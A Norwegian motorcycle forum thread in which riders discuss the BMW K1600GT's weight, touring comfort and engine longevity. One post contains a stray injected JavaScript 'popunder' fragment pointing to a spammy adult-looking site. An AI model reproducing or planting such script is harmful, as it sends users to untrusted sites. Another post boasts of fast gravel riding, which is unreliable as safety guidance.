Prøvekjørt BMW K1600GT

Forum for fulleffekt tung-MC
Svar
mekkern
Innlegg: 7576
Registrert: 06 nov 2008, 22:42
Motorsykkelen din: flere -til div kjøring.
Sted: Tranby

Re: Prøvekjørt BMW K1600GT

Legg inn av mekkern »

som jeg nettop skrev så er cbr`n på grensa med sine 262kg fulltanket..men med lavt tyngdepunkt er det ikke helt ille.
当有疑问时踢你的敌人在生殖器上,你可以道歉后

Online
Brukeravatar
dypen
Innlegg: 5231
Registrert: 28 mai 2018, 20:55
Motorsykkelen din: K1600GT
Sted: Lillestrøm

Re: Prøvekjørt BMW K1600GT

Legg inn av dypen »

Trådtittel sier alt her, K1600 fra 2011 (2010) og nyere som er innen rekkevidde fra området ca 100k og oppover avhengig av årsmodell, km, modelltype, utstyr, etc Har ingen erfaring med K1600 men har hørt lyden, sett flere i følge på veien fullasta og med to personer ombord som er ett flott skue og sikkert samme følelse kjøremessig. Har vel egentlig aldri vært tilhenger av store tunge touring maskiner, slanke lette motorsterke maskiner med lett oppakning er mer meg. Men i det senere fascinerer disse lokomotivene som ofte følger hverandre som skygger, en godt ivaretatt eldre modell er oppnåelig for alle som fortsatt er masse mc som gir opplevelser og kjøreglede. Må ikke glemme att jeg har passert 60 da :crazy:



');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
dypen :thumleft
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2

Brukeravatar
Tore L
Innlegg: 788
Registrert: 08 jul 2014, 12:25
Motorsykkelen din: 07 BMW K1200 GT -24 Triumph Tiger 900 GT Pro
Sted: Sarpsborg ( Er fra Fredrikstad)

Re: Prøvekjørt BMW K1600GT

Legg inn av Tore L »

Er helt enig at sykkler på over 300 kg er mye, og egentlig ikke ønskelig fra min side heller, med å prøve en K1600 en sesong hadde jeg ikke hatt noe i mot. Har en bekjent som kjører en K 1600, er også som meg passert 60 og sier at det er den beste tursykkel han har kjørt.
Jeg snakker om Tursykkel og ikke den en skal bruke vær dag, det blir for stort og tungt for meg å kjøre med en 300 kg +. Jeg hadde 4 Porscher på en gang også, så å ha 2 sykler må jo være innafor :) Som mekkern påpeker 150 -200 kg sykkel er mer en nok og utmerket til å bruke når en skal farte rundt på kveldsturer og i nabolaget. Har egentlig en super tursykkel i K1200 GTen, så jeg trenger ikke noe bedre, men lysten til å prøve noe annet er der vettu :) Vi får se hva som dukker opp, og hva som skjer når jeg henter sykkel ut fra sin vinter dvale. Kanskje en er fornøyd med det en har en sesong til :)
Tore Ludvigsen
x - 75 Kawasaki Z 900 - LS 4371
x - 81 Kawasaki Z 650 SR - YU 4225
x - 85 Suzuki GS 650 Katana - ZK 5773
x - 97 Yamaha XJ 900 Diversjon - BP 7238
x - 06 BMW K1200 GT - BH 4697
x - 10 BMW K1300 GT - KP 8260
x - 18 BMW R1200 GS - CU 7348

Online
Brukeravatar
FredrikE24
Innlegg: 4715
Registrert: 24 apr 2016, 18:53
Motorsykkelen din: BMW K1200RS
Sted: Nordre Follo

Re: Prøvekjørt BMW K1600GT

Legg inn av FredrikE24 »

K1600GT/GTL er høyst kapabel til å parkere de fleste om man er en over middels god fører. Jeg har selv mange mil bak en K1600GTL med en flink sjåfør, og det er heftig hvor lekent det er. Man merker mest vekta når man står stille og skal buksere på sykkelen. Her må man ta sine forhåndsregler.

For to år siden kjørte vi over noen grusbelagte fjelloverganger, så kjørte vi så grusen spruta i svingene begge to i tresifrede hastigheter. Det var fryktelig moro.. De adventure-syklene vi blåste forbi på veien fikk seg en overraskelse tror jeg..

Tror uansett det er mer morro med en lettere sykkel, typ under 200kg, men det er rekkevidden og komforten man får igjen for.

Brukeravatar
Bjerknez
Innlegg: 22864
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Prøvekjørt BMW K1600GT

Legg inn av Bjerknez »

FredrikE24 skrev: 20 feb 2022, 20:14 K1600GT/GTL er høyst kapabel til å parkere de fleste om man er en over middels god fører. Jeg har selv mange mil bak en K1600GTL med en flink sjåfør, og det er heftig hvor lekent det er. Man merker mest vekta når man står stille og skal buksere på sykkelen. Her må man ta sine forhåndsregler.

For to år siden kjørte vi over noen grusbelagte fjelloverganger, så kjørte vi så grusen spruta i svingene begge to i tresifrede hastigheter. Det var fryktelig moro.. De adventure-syklene vi blåste forbi på veien fikk seg en overraskelse tror jeg..

Tror uansett det er mer morro med en lettere sykkel, typ under 200kg, men det er rekkevidden og komforten man får igjen for.
Kan nok være en mulighet for at de på adventure syklene ikke akkurat trodde det var snakk om kappkjøring ;)

For på humpete grusbelagte veier med samme kjøreferdighet hadde nok en sjåfør på en GS parkert en K1600. Kreftene har lite og si på slike veier.

Alt til sitt bruk sier nå jeg. K1600 egner seg nok best på landeveien samt motorveier.

Online
Brukeravatar
FredrikE24
Innlegg: 4715
Registrert: 24 apr 2016, 18:53
Motorsykkelen din: BMW K1200RS
Sted: Nordre Follo

Re: Prøvekjørt BMW K1600GT

Legg inn av FredrikE24 »

Vi innhentet disse og passerte de med et blaff og en støvsky. Jeg tror nok de selv syntes det gikk fort nok.
Har nok mest med fornuften i hodet på den som kjører. Jeg tror nok både jeg og han med K1600GTL hadde store horn i panna.

En sportstourer med gode støtdempere svelger unna mye humper uten problem. Når vi snakker om tælehiv så blir det fort noe annet. Det er først på slike veier jeg kunne tenkt meg en adventure-sykkel, men kjøregleden på en mer fremoverlent sykkel er for stor til at jeg ønsker å gjøre et bytte.. Når demping er nevnt. Min sykkel har samme fjæring som en GS, bare kortere fjæringsvei, K1600GT/GTL har den videreutviklede duolever-varianten som er enda bedre. Legger man til ESA så er det riktig så komfortabelt ut på humpete vei ser det ut til.

Har ikke nevnt noe om krefter.
Jeg har sett nevnte K1600GTL fører også stå på fothvilerne å spinne bakenden ut til siden gjennom de grusete svingene beskjedent speedway-style.. Det hadde nok ikke jeg turt å gjøre på en slik..

Brukeravatar
Bjerknez
Innlegg: 22864
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Prøvekjørt BMW K1600GT

Legg inn av Bjerknez »

FredrikE24 skrev: 21 feb 2022, 13:26 Vi innhentet disse og passerte de med et blaff og en støvsky. Jeg tror nok de selv syntes det gikk fort nok.
Har nok mest med fornuften i hodet på den som kjører. Jeg tror nok både jeg og han med K1600GTL hadde store horn i panna.
Ja, det gjorde dem nok muligens. Derfor skrev jeg hvis alle hadde hatt samme kjørekunnskaper så hadde nok han på GS'en eller adventure sykkelen fått et forsprang.

Hvor du vil med "fornuften" her vet jeg dog ikke. Å passere andre i en stor støvsky som åpenbart ikke hadde samme erfaringen som deg ser ikke jeg noe fornuft i. Ikke for at jeg ikke hadde gjort det selv hvis jeg hadde hatt muligheten, men fornuft kan man vel ikke kalle det?

Hele poenget slik jeg ser det med en K1600 er kjørekomforten spesielt i høyere hastigheter og over veldig lange avstander. Jeg er ikke spesielt begeistret for GS eller adventure sykler, men at dem er gode å kjøre med er helt sikkert. Hvis man ser bort fra vindskjermen. Men den vindskjermen ser ikke ut til å være noe særlig på K1600 heller i følge tester jeg har sett.

Online
Brukeravatar
dypen
Innlegg: 5231
Registrert: 28 mai 2018, 20:55
Motorsykkelen din: K1600GT
Sted: Lillestrøm

Re: Prøvekjørt BMW K1600GT

Legg inn av dypen »

Usikker på om dette har vært tema tidligere men kanskje noen med synspunkter eller erfaring ??

»K1600 high milage» … tittet litt på nettet over hva som er mulig å få ut av en K1600 med tanke på kilometer ved normalt vedlikehold uten å overhale motor / gear og andre større vitale komponenter i løpet av kilometerne.

Vet ikke hvor troverdig siden jeg fant er men det nevnes 20 år og 240k kjørte kilometer eller 150000 miles.

150,000 Miles (mi) = 241,401.6 Kilometers (km)
Here is the short answer to how long BMW K1600s last:

The BMW K1600 can last more than 100,000 miles. BMW Motorrad designed the K1600 tour line to last for the long haul. Based on an annual mileage of 5,000 miles, if well maintained and serviced regularly, a K1600 could last over 20 years.

How Many Miles Can a BMW K1600 Last?

The K1600 has only been around since 2012 so there’s not a huge amount of data, but we are confident these machines should last for a very long time, and even 150,000 miles is not an unrealistic expectation.
LINK til artikkel: https://enginepatrol.com/how-long-bmw-k1600-last/

“I think you might be fine with racking up 100,000 miles. I am now at 129,600 miles on a 2012 GTL with no engine, final drive, transmission problems. I have had the typical issues: water pump, switches, front wheel bearing, and one coil. The bike feels better than when it was new. Oil consumption is about 1/2qt./6000 mile. Tires have been the most significant expense over time.”

There you have it, folks; the K1600 is more than capable of hitting a hundred k.
dypen :thumleft
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2

Brukeravatar
Tore L
Innlegg: 788
Registrert: 08 jul 2014, 12:25
Motorsykkelen din: 07 BMW K1200 GT -24 Triumph Tiger 900 GT Pro
Sted: Sarpsborg ( Er fra Fredrikstad)

Re: Prøvekjørt BMW K1600GT

Legg inn av Tore L »

Erfaring har jeg ikke, siden jeg ikke har eid en, men jeg tenker at det skulle vell ikke være noe spesielt og ikke kunne kjøre disse sekserne 200.000 Km eller mer. Honda sine Gold Wing har ingen problemer med å nå dette. BMW sine R 1200 RT / GS, har heller ingen problemer med det. Var en tur på mobile.de og der ligger det flere R 1200 som har passert 200.000 km - så jeg ser ikke på dette som noen stor sensasjon at en K1600 skal klare å kjøre 200.000 km +
Tore Ludvigsen
x - 75 Kawasaki Z 900 - LS 4371
x - 81 Kawasaki Z 650 SR - YU 4225
x - 85 Suzuki GS 650 Katana - ZK 5773
x - 97 Yamaha XJ 900 Diversjon - BP 7238
x - 06 BMW K1200 GT - BH 4697
x - 10 BMW K1300 GT - KP 8260
x - 18 BMW R1200 GS - CU 7348

Online
Brukeravatar
FredrikE24
Innlegg: 4715
Registrert: 24 apr 2016, 18:53
Motorsykkelen din: BMW K1200RS
Sted: Nordre Follo

Re: Prøvekjørt BMW K1600GT

Legg inn av FredrikE24 »

Nevnte turfølge har kjørt sine K1600GT/GTL over 100k før de har blitt bytta ut med ny. Det har ikke vært noen problemer med de bortsett fra at de bruker litt dekk.

Brukeravatar
Audi Mannen
Innlegg: 763
Registrert: 23 mai 2017, 14:13
Motorsykkelen din: Ducati Multistrada V4S
Sted: Ytre Nordmøre

Re: Prøvekjørt BMW K1600GT

Legg inn av Audi Mannen »

Tore L skrev: 19 feb 2022, 23:24
AJ skrev: 19 feb 2022, 22:20 Ja, det er vel nå eller aldri, Tore L ;) , om man skal satse på en tungvekter som BMW 1600.
Straks man drar litt mer på årene vil antakelig de fleste av oss nedskalere.
300 kg. + er ikke like lett å håndtere for oss opp i sekstiårene som en som er 20 år yngre, vil jeg tro... :-k

Selv merker jeg (selvfølgelig...) stor forskjell på dette når det gjelder 390'en kontra 1290'en...
Helt enig Anders - det er nå eller aldri :)
Synes det var stor forskjell på GT og GSen jeg hadde, ca 50 kg forskjell mellom de også.
Dere tenker helt rett, man må gjøre det før man blir for voksen. En kollega av meg har nylig bestilt en flett ny K1600GLT med helgardert utstyrsliste. Den ble i farge hvis og han bytta den brune salen med en i svart. Riktig valg etter mitt syn. Produksjon i uke 8 som er denne uka og han kommer på jobb hver dag med hjerteflimmer.
Men som han sier selv så har han kjørt sykkel siden ungdommen og Honda CBX var ny i butikken og tiden var nå moden for å bytte R1200RT'n. Han har akkurat passert 60 og tenker at dette blir den siste ordentlige store sykkelen. Men det er jo revers på disse beistene så håndtering er ikke så ille som man skulle tro, og som Fredrik nevner så "forsvinner" vekta på disse syklene så fort man er i gang på en merkelig måte. BMW har nok greid det denne gangen også skal vi se.
Ducati Multistrada V4S - 2021

Brukeravatar
Bjerknez
Innlegg: 22864
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Prøvekjørt BMW K1600GT

Legg inn av Bjerknez »

Vekta merker man nok trolig ikke noe til før man står stille eller evt. presser den til ytterpunktene. De færreste av oss presser sykkelen til ytterpunktene og dermed tror jeg vekten på en sykkel i normale hastigheter ikke merkes nevneverdig. Den fysiske størrelsen derimot merkes nok bedre når man skal snirkle seg mellom biler i tett trafikk.

Med sykkelen jeg har bestillt (uten sammenligning forøvrig) som befinner seg i et helt annet segment har jo en ganske dårlig nedleggsvinkel før fotpinnene treffer bakken, men så føler jeg vel at jeg har utforsket den biten av MC kjøringen nok nå, i en alder av 45 år.

Jeg må innse at jeg er faktisk har rundet 45 år med god margin og at nedlegg og bajasskjøring ikke er noe klokt for meg å satse videre på. Jeg har bestemt meg for at MC livet for meg heretter kun skal være "kos". Komfort teller mer enn det gjorde før, men ikke nok til at jeg så langt vurderer en sykkel ala K1600.

Med en rygg som hangler allerede nå, så tror jeg at jeg gjør lurt i å legge den delen av meg på hyllen og heller klappe meg selv på skulderen for at jeg faktisk fikk oppleve det, for det VAR faktisk gøy! :)

Når det er sagt, så er ikke K1600 den SISTE sykkelen jeg ville valgt hvis jeg skulle på jordomreise på to hjul. Da hadde den nok vært midt i blinken. men med en tur til vestlandet og omegn en gang i året skal jeg fint klare på den sykkelen jeg har bestillt og mere til. :)

Online
Brukeravatar
dypen
Innlegg: 5231
Registrert: 28 mai 2018, 20:55
Motorsykkelen din: K1600GT
Sted: Lillestrøm

Re: Prøvekjørt BMW K1600GT

Legg inn av dypen »

C28EDEB2-275B-4627-9CB9-7C456127B599.jpeg
7CC741CF-00E7-4059-B41C-D3C10B1CDA98.jpeg
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.
dypen :thumleft
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2

Brukeravatar
Tore L
Innlegg: 788
Registrert: 08 jul 2014, 12:25
Motorsykkelen din: 07 BMW K1200 GT -24 Triumph Tiger 900 GT Pro
Sted: Sarpsborg ( Er fra Fredrikstad)

Re: Prøvekjørt BMW K1600GT

Legg inn av Tore L »

Tror nesten du må kjøpe deg en jeg dypen :)
Tore Ludvigsen
x - 75 Kawasaki Z 900 - LS 4371
x - 81 Kawasaki Z 650 SR - YU 4225
x - 85 Suzuki GS 650 Katana - ZK 5773
x - 97 Yamaha XJ 900 Diversjon - BP 7238
x - 06 BMW K1200 GT - BH 4697
x - 10 BMW K1300 GT - KP 8260
x - 18 BMW R1200 GS - CU 7348

Online
Brukeravatar
dypen
Innlegg: 5231
Registrert: 28 mai 2018, 20:55
Motorsykkelen din: K1600GT
Sted: Lillestrøm

Re: Prøvekjørt BMW K1600GT

Legg inn av dypen »

Tore L skrev: 25 feb 2022, 22:54 Tror nesten du må kjøpe deg en jeg dypen :)
Vi får se da :)
dypen :thumleft
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2

Svar